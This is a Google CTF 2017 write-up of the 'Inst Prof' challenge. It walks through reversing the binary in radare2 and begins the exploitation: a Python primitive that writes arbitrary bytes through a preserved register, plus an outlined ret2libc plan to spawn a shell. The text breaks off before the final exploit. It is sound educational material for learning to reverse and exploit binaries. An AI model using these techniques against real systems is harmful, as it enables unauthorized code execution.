GoogleCTF 2017: Inst Prof 152 (final value)
This was a very enjoyable and well thought out challenge from Google CTF. I'd never participated in a Google CTF before, and my expectations were high in terms of difficulty. Needless to say, I was not disappointed in the difficulty department. About halfway through I began thinking of this challenge as the "Instruction Professor" - as in, x86-64 assembly instruction - due to the inordinate amount of x86 assembly I was manually typing out and grokking.
Despite the extreme low-leveledness of the challenge work, I had tons of fun solving this challenge, and learned quite a bit more about linux, memory, and myself in the process.
If you're just looking for my solution itself (instead of a journaling of my process), simply click here to jump to the solution. If, however, you'd like a little insight into my thought process and techniques involved, please read on.
I've split this writeup into two parts, Reversing
and Pwning
.
-
Reversing - In this section I'll go over how I use radare2 to understand how the challenge works. I provide examples and explanations of commands where I can. This section is geared toward those who are less familiar with
radare2
or with assembly/reversing in general. -
Pwning - This section will illustrate how the challenge program was exploited. I'll go over some early strategies and discoveries that were made, as well as what the solution script does in detail.
Reversing the Binary
After firing up the scoreboard on Friday, I saw the lowest point pwn
challenge was Inst Prof
, so I puzzled briefly over the flavor text and downloaded the binary:
Please help test our new compiler micro-service
Challenge running at inst-prof.ctfcompetition.com:1337
I took a look at some of the details of the binary:
-> % checksec --file ./inst_prof
RELRO STACK CANARY NX PIE RPATH RUNPATH FILE
Partial RELRO No canary found NX enabled PIE enabled No RPATH No RUNPATH ./inst_prof
-> % file ./inst_prof
./inst_prof: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2,
for GNU/Linux 2.6.24, BuildID[sha1]=61e50b540c3c8e7bcef3cb73f3ad2a10c2589089, not stripped
The thing that stood out to me was that PIE (Position Independent Executable) was turned on, and that NX (No eXecute) was set. Undeterred, I proceeded to shift into mad (computer) scientist mode, and started poking the beast.
I went ahead and ran the program to see what it did. It seemed to sleep()
for a few seconds before printing ready
:
-> % ./inst_prof
initializing prof...ready
HERPDERP
[1] 19938 segmentation fault (core dumped) ./inst_prof.bak
The most immediate thought I had was that I need to get rid of the sleep(), otherwise playing with the binary would be pain every time I went to start it up. So that was step 1:
Brain Surgery
I opened the binary with radare2
using r2 -d inst_prof
to get a better look at what was happening:
[0x7f6844843d80]> s main
[0x559b6f54c860]> pd 30
;-- main:
;-- section_end..plt:
;-- section..text:
;-- main:
0x559b6f54c860 55 push rbp ; section 13 va=0x559b6f54c860 pa=0x00000860 sz=882 vsz=882 rwx=--r-x .text
0x559b6f54c861 488d357c0300. lea rsi, qword str.initializing_prof... ; 0x559b6f54cbe4 ; "initializing prof..."
0x559b6f54c868 ba14000000 mov edx, 0x14 ; 20
0x559b6f54c86d bf01000000 mov edi, 1
0x559b6f54c872 4889e5 mov rbp, rsp
0x559b6f54c875 e836ffffff call sym.imp.write
0x559b6f54c87a 4883f814 cmp rax, 0x14 ; 20
,=< 0x559b6f54c87e 7407 je 0x559b6f54c887
.--> 0x559b6f54c880 31ff xor edi, edi
|| 0x559b6f54c882 e8a9ffffff call sym.imp.exit
|`-> 0x559b6f54c887 bf05000000 mov edi, 5
| 0x559b6f54c88c e8afffffff call sym.imp.sleep
| 0x559b6f54c891 bf1e000000 mov edi, 0x1e ; 30
| 0x559b6f54c896 e835ffffff call sym.imp.alarm
| 0x559b6f54c89b 488d35570300. lea rsi, qword str.ready_n ; 0x559b6f54cbf9 ; "ready\n"
| 0x559b6f54c8a2 ba06000000 mov edx, 6
| 0x559b6f54c8a7 bf01000000 mov edi, 1
| 0x559b6f54c8ac e8fffeffff call sym.imp.write
| 0x559b6f54c8b1 4883f806 cmp rax, 6 ; 6
`==< 0x559b6f54c8b5 75c9 jne 0x559b6f54c880
0x559b6f54c8b7 660f1f840000. nop word [rax + rax]
.-> 0x559b6f54c8c0 31c0 xor eax, eax
| 0x559b6f54c8c2 e8f9010000 call sym.do_test
`=< 0x559b6f54c8c7 ebf7 jmp 0x559b6f54c8c0
s
lets you seek to an address (or symbol)
pd #
lets you print disassembly of # instructions (from current seek)
Above is the disassembly output of the main
function. My eyes were drawn to the three highlighted lines: Calls to sleep()
, alarm()
, and do_test()
.
From past CTF experience I knew that sleep()
and alarm()
were both used as mild deterrents that could easily be disabled. If we look at the arg0
s for both of these functions (in the edi
register), we'll see that they're taking five and thirty seconds respectively.
Five seconds was the delay experienced after seeing the initializing prof...
message, and indeed we can see above that both the sleep
and alarm
function calls occur between the write
s to STDOUT
.
Before moving on to inspecting the do_test
function, I performed my first operation:
-> % r2 -w inst_prof
[0x000008c9]> wx 9090909090 @ 0x88c
[0x000008c9]> wx 9090909090 @ 0x896
[0x000008c9]> s main
[0x00000860]> pd 32
;-- main:
;-- section_end..plt:
;-- section..text:
;-- main:
0x00000860 55 push rbp ; section 13 va=0x00000860 pa=0x00000860 sz=882 vsz=882 rwx=--r-x .text
0x00000861 488d357c0300. lea rsi, qword str.initializing_prof... ; 0xbe4 ; "initializing prof..."
0x00000868 ba14000000 mov edx, 0x14
0x0000086d bf01000000 mov edi, 1
0x00000872 4889e5 mov rbp, rsp
0x00000875 e836ffffff call sym.imp.write
0x0000087a 4883f814 cmp rax, 0x14
,=< 0x0000087e 7407 je 0x887
.--> 0x00000880 31ff xor edi, edi
|| 0x00000882 e8a9ffffff call sym.imp.exit
|`-> 0x00000887 bf05000000 mov edi, 5
| 0x0000088c 90 nop
| 0x0000088d 90 nop
| 0x0000088e 90 nop
| 0x0000088f 90 nop
| 0x00000890 90 nop
| 0x00000891 bf1e000000 mov edi, 0x1e
| 0x00000896 90 nop
| 0x00000897 90 nop
| 0x00000898 90 nop
| 0x00000899 90 nop
| 0x0000089a 90 nop
| 0x0000089b 488d35570300. lea rsi, qword str.ready_n ; 0xbf9 ; "ready\n"
| 0x000008a2 ba06000000 mov edx, 6
| 0x000008a7 bf01000000 mov edi, 1
| 0x000008ac e8fffeffff call sym.imp.write
| 0x000008b1 4883f806 cmp rax, 6
`==< 0x000008b5 75c9 jne 0x880
0x000008b7 660f1f840000. nop word [rax + rax]
.-> 0x000008c0 31c0 xor eax, eax
| 0x000008c2 e8f9010000 call sym.do_test
`=< 0x000008c7 ebf7 jmp 0x8c0
Invoking
radare2
with the-w
switch opens the binary file in write mode, allowing radare2 to write data to the file.The
wx
command is short forw
rite hex
, and allows for writing raw bytes to an offset specified by either the current seek or@
a temporary seek offset. Notice that the addresses (left column) no longer represent virtual addresses of a process, but rather absolute addresses of a file on disk.Then notice that the least significant 12 bits are the same in the file as in the process! This has to do with the fact that the base address that the text section of the binary is loaded into (when it becomes a process) will always have the least significant 12 bits unset (all 0's)!
We can see that the two commands issued wrote 0x90
five times for each address 0x88c
and 0x896
, which fully overwrote both the sleep
and alarm
calls with nop
s. So now the binary will no longer pause or get the alarm
signal sent to it (which may or may not have broken something later down the road).
Under the Microscope
Now that the speed bumps were removed, it was time to take a look at the do_test
function. I took note that the instruction after calling do_test
is an unconditional jmp
to clearing the eax
register just before calling the same function; an endless loop.
Then I disassembled the function:
[0x562bd0896860]> pd @ sym.do_test
;-- do_test:
0x562bd0896ac0 55 push rbp
0x562bd0896ac1 31c0 xor eax, eax
0x562bd0896ac3 4889e5 mov rbp, rsp
0x562bd0896ac6 4154 push r12
0x562bd0896ac8 53 push rbx
0x562bd0896ac9 4883ec10 sub rsp, 0x10
0x562bd0896acd e81effffff call sym.alloc_page
0x562bd0896ad2 4889c3 mov rbx, rax
0x562bd0896ad5 488d05240100. lea rax, qword sym.template ; obj.template ; 0x562bd0896c00
0x562bd0896adc 488d7b05 lea rdi, qword [rbx + 5] ; 5
0x562bd0896ae0 488b10 mov rdx, qword [rax]
0x562bd0896ae3 488913 mov qword [rbx], rdx
0x562bd0896ae6 8b5008 mov edx, dword [rax + 8] ; [0x8:4]=-1 ; 8
0x562bd0896ae9 895308 mov dword [rbx + 8], edx
0x562bd0896aec 0fb7500c movzx edx, word [rax + 0xc] ; [0xc:2]=0xffff ; 12
0x562bd0896af0 0fb6400e movzx eax, byte [rax + 0xe] ; [0xe:1]=255 ; 14
0x562bd0896af4 6689530c mov word [rbx + 0xc], dx
0x562bd0896af8 88430e mov byte [rbx + 0xe], al
0x562bd0896afb e8b0ffffff call sym.read_inst
0x562bd0896b00 4889df mov rdi, rbx
0x562bd0896b03 e818ffffff call sym.make_page_executable
0x562bd0896b08 0f31 rdtsc
0x562bd0896b0a 48c1e220 shl rdx, 0x20
0x562bd0896b0e 4989c4 mov r12, rax
0x562bd0896b11 31c0 xor eax, eax
0x562bd0896b13 4909d4 or r12, rdx
0x562bd0896b16 ffd3 call rbx
0x562bd0896b18 0f31 rdtsc
0x562bd0896b1a bf01000000 mov edi, 1
0x562bd0896b1f 48c1e220 shl rdx, 0x20
0x562bd0896b23 488d75e8 lea rsi, qword [rbp - 0x18]
0x562bd0896b27 4809c2 or rdx, rax
0x562bd0896b2a 4c29e2 sub rdx, r12
0x562bd0896b2d 488955e8 mov qword [rbp - 0x18], rdx
0x562bd0896b31 ba08000000 mov edx, 8
0x562bd0896b36 e875fcffff call sym.imp.write
0x562bd0896b3b 4883f808 cmp rax, 8 ; 8
,=< 0x562bd0896b3f 7511 jne 0x562bd0896b52
| 0x562bd0896b41 4889df mov rdi, rbx
| 0x562bd0896b44 e8f7feffff call sym.free_page
| 0x562bd0896b49 4883c410 add rsp, 0x10
| 0x562bd0896b4d 5b pop rbx
| 0x562bd0896b4e 415c pop r12
| 0x562bd0896b50 5d pop rbp
| 0x562bd0896b51 c3 ret
`-> 0x562bd0896b52 31ff xor edi, edi
0x562bd0896b54 e8d7fcffff call sym.imp.exit
0x562bd0896b59 0f1f80000000. nop dword [rax]
We can see above in the disassembly the calls that do_test
makes, which I've highlighted. Of particular interest is the call rbx
instruction which comes after the make_page_executable
function. Without digging deeper, my assumption for why the program crashed was that it was expecting me to input x86 instructions (in read_inst
) that would get executed (after make_page_executable
), which HERPDERP
definitely was not.
To see if this was right, I needed to look at the three calls before the one to rbx
.
Pagemaster
First I looked at alloc_page
:
[0x5635884f4ac0]> pd @ sym.alloc_page
||| ;-- alloc_page:
||| 0x5635884f49f0 55 push rbp
||| 0x5635884f49f1 4531c9 xor r9d, r9d
||| 0x5635884f49f4 41b8ffffffff mov r8d, 0xffffffff ; -1
||| 0x5635884f49fa b922000000 mov ecx, 0x22 ; '"' ; 34
||| 0x5635884f49ff ba03000000 mov edx, 3
||| 0x5635884f4a04 be00100000 mov esi, 0x1000
||| 0x5635884f4a09 4889e5 mov rbp, rsp
||| 0x5635884f4a0c 31ff xor edi, edi
||| 0x5635884f4a0e 5d pop rbp
||`=< 0x5635884f4a0f e9acfdffff jmp sym.imp.mmap
|| 0x5635884f4a14 6666662e0f1f. nop word cs:[rax + rax]
Which I saw made a call to mmap
. Looking at the man page for mmap using man 2 mmap
revealed the function signature:
void *mmap(void *addr, size_t length, int prot, int flags,
int fd, off_t offset);
as well as some additional information about the parameters, especially the prot
parameter, which is supplied as a bitwise OR of the following:
-> % cat /usr/include/bits/mman-linux.h | grep -P '#define\s+PROT'
#define PROT_READ 0x1 /* Page can be read. */
#define PROT_WRITE 0x2 /* Page can be written. */
#define PROT_EXEC 0x4 /* Page can be executed. */
#define PROT_NONE 0x0 /* Page can not be accessed. */
#define PROT_GROWSDOWN 0x01000000 /* Extend change to start of
#define PROT_GROWSUP 0x02000000 /* Extend change to start of
Since we know that the arguments on x86-64 are supplied in the registers rdi
, rsi
, rdx
, rcx
, r8
, r9
, we can see the call to mmap
is made as:
mmap(0, 0x1000, PROT_READ | PROT_WRITE, 0x22, 0xffffffff, 0)
This creates a new mapped region of memory that is 0x1000
bytes large, at a starting offset chosen by the kernel, that is readable and writable. The start address of the mmap
ed region is returned in the rax
register.
Looking back at the above disassembly of do_test
, I saw after the alloc_page
that something was ocurring before the read_inst
call involving something that radare labeled as obj.template
.
Before trying to understand the code, I took a look at the obj.template
:
[0x5635884f4ac0]> pxq 0x10 @ obj.template
0x5635884f4c00 0x90909000001000b9 0x00c3f77501e98390 ............u...
[0x5635884f4ac0]> pd 8 @ obj.template
;-- template:
0x5635884f4c00 b900100000 mov ecx, 0x1000
.-> 0x5635884f4c05 90 nop
| 0x5635884f4c06 90 nop
| 0x5635884f4c07 90 nop
| 0x5635884f4c08 90 nop
| 0x5635884f4c09 83e901 sub ecx, 1
`=< 0x5635884f4c0c 75f7 jne 0x5635884f4c05
0x5635884f4c0e c3 ret
The
pxq #
command prints # hex quadwords (in little endian) at the offset specified (obj.template in this case).
Hmm, it looks as if the obj.template
is potentially a loop function of some sort. It appears to execute nop
four times in a loop which repeats 0x1000
times.
Taking a long look at the assembly which references this obj.template
gave me an understanding of what it did with it:
0x5635884f4acd e81effffff call sym.alloc_page
0x5635884f4ad2 4889c3 mov rbx, rax ;save addr of new page (from rax)
0x5635884f4ad5 488d05240100. lea rax, qword obj.template ;load obj.template addr
0x5635884f4adc 488d7b05 lea rdi, qword [rbx + 5] ;seek 5 into new page
0x5635884f4ae0 488b10 mov rdx, qword [rax] ;copy first 8 bytes of obj.template
0x5635884f4ae3 488913 mov qword [rbx], rdx ;paste them into new page
0x5635884f4ae6 8b5008 mov edx, dword [rax + 8] ;copy template bytes 0x8 to 0xb
0x5635884f4ae9 895308 mov dword [rbx + 8], edx ;paste into bytes 0x8 to 0xb
0x5635884f4aec 0fb7500c movzx edx, word [rax + 0xc] ;copy template bytes 0xc and 0xd
0x5635884f4af0 0fb6400e movzx eax, byte [rax + 0xe] ;copy last template byte
0x5635884f4af4 6689530c mov word [rbx + 0xc], dx ;paste template bytes 0xc and 0xd
0x5635884f4af8 88430e mov byte [rbx + 0xe], al ;paste last template byte (0xe)
0x5635884f4afb e8b0ffffff call sym.read_inst
If that was still unclear, essentially the template bytes are copied into the start of the newly allocated page we got from alloc_page
.
Up to this point I'd only been taking a look at the code statically, however I decided to run it to check my understanding. I ran the code after setting breakpoints on both the alloc_page
and read_inst
calls:
[0x5635884f4ac0]> db 0x5635884f4acd
[0x5635884f4ac0]> db 0x5635884f4afb
[0x5635884f4ac0]> dc
Selecting and continuing: 2864
initializing prof...ready
hit breakpoint at: 5635884f4acd
[0x5635884f4acd]> dr rax
0x00000000
[0x5635884f4acd]> dso
hit breakpoint at: 5635884f4ad2
[0x5635884f4acd]> dr rax
0x7f0f9b91c000
[0x5635884f4acd]> pxq 0x10 @ 0x7f0f9b91c000
0x7f0f9b91c000 0x0000000000000000 0x0000000000000000 ................
[0x5635884f4acd]> dc
Selecting and continuing: 2864
hit breakpoint at: 5635884f4afb
[0x5635884f4acd]> pxq 0x10 @ 0x7f0f9b91c000
0x7f0f9b91c000 0x90909000001000b9 0x00c3f77501e98390 ............u...
db
is the debug breakpoint command;dc
is the debug continue command
dr
is the debug register command;dso
is the debug step over command
From the above output I verified that the obj.template
data was copied into the region mapped by alloc_page
, and using the dm
(debug memory [map]) command showed me that a new page had been mapped for the process (highlighted):
[0x5635884f4acd]> dm
sys 4K 0x00005635884f4000 * 0x00005635884f5000 s -r-x /googleCTF_06-2017/pwn_inst-prof/inst_prof ; map._googleCTF_06_2017_pwn_inst_prof_inst_prof._r_x
sys 4K 0x00005635886f5000 - 0x00005635886f6000 s -r-- /googleCTF_06-2017/pwn_inst-prof/inst_prof ; map._googleCTF_06_2017_pwn_inst_prof_inst_prof._rw_
sys 4K 0x00005635886f6000 - 0x00005635886f7000 s -rw- /googleCTF_06-2017/pwn_inst-prof/inst_prof ; obj._GLOBAL_OFFSET_TABLE_
sys 1.6M 0x00007f0f9b357000 - 0x00007f0f9b4f2000 s -r-x /usr/lib/libc-2.25.so /usr/lib/libc-2.25.so
sys 2.0M 0x00007f0f9b4f2000 - 0x00007f0f9b6f1000 s ---- /usr/lib/libc-2.25.so /usr/lib/libc-2.25.so
sys 16K 0x00007f0f9b6f1000 - 0x00007f0f9b6f5000 s -r-- /usr/lib/libc-2.25.so /usr/lib/libc-2.25.so
sys 8K 0x00007f0f9b6f5000 - 0x00007f0f9b6f7000 s -rw- /usr/lib/libc-2.25.so /usr/lib/libc-2.25.so
sys 16K 0x00007f0f9b6f7000 - 0x00007f0f9b6fb000 s -rw- unk0 unk0
sys 140K 0x00007f0f9b6fb000 - 0x00007f0f9b71e000 s -r-x /usr/lib/ld-2.25.so /usr/lib/ld-2.25.so ; map._usr_lib_ld_2.25.so._r_x
sys 8K 0x00007f0f9b8cc000 - 0x00007f0f9b8ce000 s -rw- unk1 unk1
sys 4K 0x00007f0f9b91c000 - 0x00007f0f9b91d000 s -rw- unk2 unk2 ; rbx
sys 4K 0x00007f0f9b91d000 - 0x00007f0f9b91e000 s -r-- /usr/lib/ld-2.25.so /usr/lib/ld-2.25.so ; map._usr_lib_ld_2.25.so._rw_
sys 4K 0x00007f0f9b91e000 - 0x00007f0f9b91f000 s -rw- /usr/lib/ld-2.25.so /usr/lib/ld-2.25.so
sys 4K 0x00007f0f9b91f000 - 0x00007f0f9b920000 s -rw- unk3 unk3 ; map.unk0._rw_
sys 132K 0x00007ffc046ac000 - 0x00007ffc046cd000 s -rw- [stack] [stack] ; map._stack_._rw_
sys 8K 0x00007ffc0479e000 - 0x00007ffc047a0000 s -r-- [vvar] [vvar] ; map._vvar_._r__
sys 8K 0x00007ffc047a0000 - 0x00007ffc047a2000 s -r-x [vdso] [vdso] ; map._vdso_._r_x
sys 4K 0xffffffffff600000 - 0xffffffffff601000 s -r-x [vsyscall] [vsyscall] ; map._vsyscall_._r_x
So far, so good. Now I just had to look at and understand the remaining two functions in do_test
: read_inst
and make_page_executable
.
Instruct Radare
[0x562e80db3ab0]> pd 6 @ sym.read_inst
/ (fcn) sym.read_inst 63
| sym.read_inst ();
| | ; CALL XREF from 0x562e80db3afb (sym.do_test)
| | 0x562e80db3ab0 55 push rbp
| | 0x562e80db3ab1 be04000000 mov esi, 4
| | 0x562e80db3ab6 4889e5 mov rbp, rsp
| | 0x562e80db3ab9 5d pop rbp
\ `=< 0x562e80db3aba e9c1ffffff jmp sym.read_n
0x562e80db3abf 90 nop
[0x562e80db3ab0]> pd @ sym.read_n
.-> ;-- read_n:
| ; JMP XREF from 0x562e80db3aba (sym.read_inst)
| .-> 0x562e80db3a80 55 push rbp
| | 0x562e80db3a81 4885f6 test rsi, rsi
| | 0x562e80db3a84 4889e5 mov rbp, rsp
| | 0x562e80db3a87 4154 push r12
| | 0x562e80db3a89 4c8d2437 lea r12, qword [rdi + rsi]
| | 0x562e80db3a8d 53 push rbx
| | 0x562e80db3a8e 4889fb mov rbx, rdi
| ,==< 0x562e80db3a91 7418 je 0x562e80db3aab
| || 0x562e80db3a93 0f1f440000 nop dword [rax + rax]
| .---> 0x562e80db3a98 31c0 xor eax, eax
| ||| 0x562e80db3a9a 4883c301 add rbx, 1
| ||| 0x562e80db3a9e e8adffffff call sym.read_byte ; ssize_t read(int fildes, void *buf, size_t nbyte)
| ||| 0x562e80db3aa3 8843ff mov byte [rbx - 1], al
| ||| 0x562e80db3aa6 4c39e3 cmp rbx, r12
| `===< 0x562e80db3aa9 75ed jne 0x562e80db3a98
| `--> 0x562e80db3aab 5b pop rbx
| | 0x562e80db3aac 415c pop r12
| | 0x562e80db3aae 5d pop rbp
| | 0x562e80db3aaf c3 ret
We can see from the disassembly of read_inst
above that the value of 4
is passed via the rsi
register to read_n
.
In the read_n
function, rsi
is immediately test
ed, which would set the ZF
flag (if it was 0) which would shortcut the function at the je
call at address 0x562e80db3a91
. In our case, it's always set to 4
, and so the value is then used in combination with rdi
with the instruction lea r12, qword [rdi + rsi]
.
r12
is referenced before the jne
call at 0x562e80db3aa9
, and is essentially acting as a counter for how many times call sym.read_byte
is called, returning when then value passed via rsi
(0x4
in our case) has been reached.
Looking at the read_byte
function reveals:
[0x562e80db3ab0]> pd @ sym.read_byte
/ (fcn) sym.read_byte 47
| sym.read_byte ();
| ; var int local_1h @ rbp-0x1
| ; CALL XREF from 0x562e80db3a9e (sym.read_inst)
| 0x562e80db3a50 55 push rbp
| 0x562e80db3a51 31ff xor edi, edi
| 0x562e80db3a53 ba01000000 mov edx, 1
| 0x562e80db3a58 4889e5 mov rbp, rsp
| 0x562e80db3a5b 4883ec10 sub rsp, 0x10
| 0x562e80db3a5f 488d75ff lea rsi, qword [local_1h]
| 0x562e80db3a63 c645ff00 mov byte [local_1h], 0
| 0x562e80db3a67 e874fdffff call sym.imp.read ; ssize_t read(int fildes, void *buf, size_t nbyte)
| 0x562e80db3a6c 4883f801 cmp rax, 1 ; 1
| ,=< 0x562e80db3a70 7506 jne 0x562e80db3a78
| | 0x562e80db3a72 0fb645ff movzx eax, byte [local_1h]
| | 0x562e80db3a76 c9 leave
| | 0x562e80db3a77 c3 ret
| `-> 0x562e80db3a78 31ff xor edi, edi
\ 0x562e80db3a7a e8b1fdffff call sym.imp.exit ; void exit(int status)
0x562e80db3a7f 90 nop
Here we finally see the call to sym.imp.read
which is the libc function call which reads from STDIN
a number of bytes.
I set a breakpoint on the line highlighted above to see what its parameters were:
[0x562e80db3ab0]> db 0x562e80db3a67
[0x562e80db3a67]> pd 1
| ;-- rip:
| 0x562e80db3a67 b e874fdffff call sym.imp.read ; ssize_t read(int fildes, void *buf, size_t nbyte)
[0x562e80db3a67]> dr rdi; dr rsi; dr rdx
0x00000000
0x7ffd632550af
0x00000001
We can see that it's reading from fd 0
(file descriptor 0) which is STDIN
. It's reading into memory address 0x7ffd632550af
, and reading only a single byte.
After reading a single character from STDIN, it returns the character in eax
, which read_n
writes to [rbx - 1]
I let the process run 4 times, sending 0xc3
each time, and stepped back until I was at do_test
, where I found that the 4 bytes are read into the copied obj.template
, which is currently stored at the address in rbx
:
[0x55cc2a53eaf8]> pd 8 @ rbx
;-- map.unk2._rw_:
;-- rbx:
0x7feffd3ea000 b900100000 mov ecx, 0x1000
,=> 0x7feffd3ea005 c3 ret
| 0x7feffd3ea006 c3 ret
| 0x7feffd3ea007 c3 ret
| 0x7feffd3ea008 c3 ret
| 0x7feffd3ea009 83e901 sub ecx, 1
`-< 0x7feffd3ea00c 75f7 jne 0x7feffd3ea005
0x7feffd3ea00e c3 ret
Notice that the 4
nop
instructions from the template were overwritten with the bytes I supplied (0xc3
in this case).
Feeling comfortable that I understood everything so far, I took a look at make_page_executable
.
It'll Give You Wings
Looking at do_test
, we see just prior to calling make_page_executable
, that our copied template section stored in rbx
is moved into rdi
:
[0x55cc2a53eb00]> pd 2
| ;-- rip:
| 0x55cc2a53eb00 4889df mov rdi, rbx
| 0x55cc2a53eb03 e818ffffff call sym.make_page_executable
Then when we look at make_page_executable
:
[0x55cc2a53eb00]> pd @ sym.make_page_executable
/ (fcn) sym.make_page_executable 20
| sym.make_page_executable ();
| || ; CALL XREF from 0x55cc2a53eb03 (sym.do_test)
| || 0x55cc2a53ea20 55 push rbp
| || 0x55cc2a53ea21 ba05000000 mov edx, 5
| || 0x55cc2a53ea26 be00100000 mov esi, 0x1000
| || 0x55cc2a53ea2b 4889e5 mov rbp, rsp
| || 0x55cc2a53ea2e 5d pop rbp
\ `==< 0x55cc2a53ea2f e9ecfdffff jmp sym.imp.mprotect
We see that it is just a wrapper around mprotect
, which has the signature:
int mprotect(void *addr, size_t len, int prot)
This wrapped call to mprotect
uses the address in rdi
(our copied template with 4 custom instruction bytes) as the target addr
ess. len
is set via rsi
being 0x1000
which is a 4k page, and prot
is set via rdx
being set to 0x05
, which marks the region as readable and executable.
Back in do_test
, we see that rbx
(which also holds the address to our copied template) is directly call
ed, which will execute our 4 bytes worth of instructions in a 0x1000
loop before returning.
Once this is done, do_test
calls write
using a cycle count from rdtsc
in rax
in combination with the value in r12
. I didn't pay this much attention while solving the challenge, and would only later learn that I could have used this functionality to leak data from the process.
After this, the loop executable region with our custom bytes is freed, and the process is endlessly repeated with subsequent calls to do_test
.
Pwnsploitation
The next day I met up with my friend Ambrose and we teamed up to go over our understanding of the binary as presented above, as well as to start in on the exploitation process.
After we had a solid understanding of what the binary did, the challenge was (seemingly) simple: we had to figure out how to use 1, 2, 3, and 4 byte assembly instructions to get a shell.
The first thing I did was generate a list of all 1 and 2 byte assembly instructions using the rasm2
binary that comes with radare just to get an idea of what kind of instructions we'd be able to use:
-> % (python3 -c 'print("\n".join([hex(x)[2:].zfill(2) for x in range(256)]))' | while read i; do echo -n "$i = ";
rasm2 -ax86 -b64 -d "$i"; done;) | grep -v invalid
50 = push rax
51 = push rcx
52 = push rdx
53 = push rbx
54 = push rsp
55 = push rbp
56 = push rsi
57 = push rdi
58 = pop rax
59 = pop rcx
5a = pop rdx
5b = pop rbx
5c = pop rsp
5d = pop rbp
5e = pop rsi
5f = pop rdi
6c = insb byte [rdi], dx
6d = insd dword [rdi], dx
6e = outsb dx, byte [rsi]
6f = outsd dx, dword [rsi]
90 = nop
91 = xchg eax, ecx
92 = xchg eax, edx
93 = xchg eax, ebx
94 = xchg eax, esp
95 = xchg eax, ebp
96 = xchg eax, esi
97 = xchg eax, edi
98 = cwde
99 = cdq
9b = wait
9c = pushfq
9d = popfq
9e = sahf
9f = lahf
a4 = movsb byte [rdi], byte ptr [rsi]
a5 = movsd dword [rdi], dword ptr [rsi]
a6 = cmpsb byte [rsi], byte ptr [rdi]
a7 = cmpsd dword [rsi], dword ptr [rdi]
aa = stosb byte [rdi], al
ab = stosd dword [rdi], eax
ac = lodsb al, byte [rsi]
ad = lodsd eax, dword [rsi]
ae = scasb al, byte [rdi]
af = scasd eax, dword [rdi]
c3 = ret
c9 = leave
cb = retf
cc = int3
cf = iretd
d6 = salc
d7 = xlatb
ec = in al, dx
ed = in eax, dx
ee = out dx, al
ef = out dx, eax
f1 = int1
f4 = hlt
f5 = cmc
f8 = clc
f9 = stc
fa = cli
fb = sti
fc = cld
fd = std
-> % (python3 -c 'print("\n".join([hex(x)[2:].zfill(4) for x in range(256, 0x10000)]))' | while read i; do echo -n "$i = ";
rasm2 -ax86 -b64 -d "$i"; done;) | grep -v invalid
<lots of assembly instructions redacted>
I was intent on compiling an exhaustive list of instructions we'd be allowed to use, but was running into some issues with the 3 byte instructions as there were 16777215 potential instructions to evaluate.
Meanwhile I asked my friend if he could see if any of the registers' states were saved in between the do_test
loops.
It was then that I realized that sometimes it's not worth it to try solving a more general problem if you could just cut to the chase with some manual tests.
Revelation Registered
Registered
The breakthrough came when he discovered that the r15
and r14
registers were preserved across iterations of the do_test
loop. I think he verified using a simple sequence like this:
[0x7f2d4994a000]> pd 8
;-- map.unk2._rw_:
;-- rbx:
;-- rdi:
;-- rip:
0x7f2d4994a000 b900100000 mov ecx, 0x1000 ; rsi
.-> 0x7f2d4994a005 90 nop
| 0x7f2d4994a006 90 nop
| 0x7f2d4994a007 90 nop
| 0x7f2d4994a008 90 nop
| 0x7f2d4994a009 83e901 sub ecx, 1
`=< 0x7f2d4994a00c 75f7 jne 0x7f2d4994a005
0x7f2d4994a00e c3 ret
[0x7f2d4994a000]> dr r13; dr r14; dr r15
0x7ffc7df020c0
0x00000000
0x00000000
[0x7f2d4994a000]> dr r15=0xdeadbeef
0x00000000 ->0xdeadbeef
[0x7f2d4994a000]> dc
[0x7f2d4994a000]> pd 8
;-- map.unk2._rw_:
;-- rbx:
;-- rdi:
;-- rip:
0x7f2d4994a000 b900100000 mov ecx, 0x1000 ; rsi
.-> 0x7f2d4994a005 90 nop
| 0x7f2d4994a006 90 nop
| 0x7f2d4994a007 90 nop
| 0x7f2d4994a008 90 nop
| 0x7f2d4994a009 83e901 sub ecx, 1
`=< 0x7f2d4994a00c 75f7 jne 0x7f2d4994a005
0x7f2d4994a00e c3 ret
[0x7f2d4994a000]> dr r13; dr r14; dr r15
0x7ffc7df020c0
0x00000000
0xdeadbeef
dr
can also directly set register values (in addition to displaying them) using thedr reg=...
notation as shown in the first highlighted command above.At the second highlighted command above (
dc
), we had theSTDIN
of the binary attached to python so we could send it arbitrary bytes when the program usedread()
(0x90
* 4 in this case)
We can see that when setting the register value prior to continuing execution with dc
that the register value (r15
in this case) is preserved after arriving at the loop section a second time.
I also verified that r13
was preserved using the same method. I then scrapped my instruction-enumeration approach and tried assembling some useful instructions to see how big they were:
-> % rasm2 -ax86.ks -b64 'mov r15, rsp'
4989e7
-> % rasm2 -ax86.ks -b64 'mov [r15], rsp'
498927
-> % rasm2 -ax86.ks -b64 'mov [r15+8], rsp'
49896708
-> % rasm2 -ax86.ks -b64 'pop r15'
415f
-> % rasm2 -ax86.ks -b64 'shl r15, 0x20'
49c1e720
-> % rasm2 -ax86.ks -b64 'sub rsp, 0x1000'
4881ec00100000
-> % rasm2 -ax86.ks -b64 'ret'
c3
We realized here that there were some (what we called) absolute instructions and some relative instructions; some instructions like mov
were not affected by being executed 0x1000
times in the loop, while others, like shl r15, 0x20
would not survive being run multiple times in a loop.
This was tied to the instruction length being 3 or 4 bytes. Where instructions that were 3 bytes in length could have a ret
appended (one byte: c3
) to escape the loop, instructions which were 4 bytes in length had to be run all 0x1000
times.
Instructions that were larger than 4 bytes (like the sub rsp, 0x1000
above) could not be run.
While I was still learning more about different x86 instructions, my friend put together a simple write data primitive:
def writeByteStr(byteString):
writeCmd = '\x41\xc6\x07' #mov byte [r15], {}
incCmd = '\x49\xff\xc7' #inc r15
for b in byteString:
p.send(writeCmd + b)
p.send(incCmd + ret)
This function would write data to the address stored in the r15
register, incrementing it to keep the cursor position current after each written byte.
At this point we were able to write data as long as the address in r15 was in a writable segment, however we needed a game plan of what to write where (as well as how to get what address into r15
).
Plan A
The first plan I pitched was that of performing a ret2libc
-type exploit where we simply called libc's system
function with /bin/bash
as the target. In the past I'd done this by leaking a libc function address from the Global Offset Table, deducing which libc was being employed remotely, calculating the offset of system
, and making a small ROP chain to jump to this function.
When we started down this road, it became apparent that there were some formidible obstacles in our way. Mainly the PIE and the requirement of leaking data. It was while we were brainstorming how to get around these that the realization that mprotect
was being called set in. And so Plan B took form.
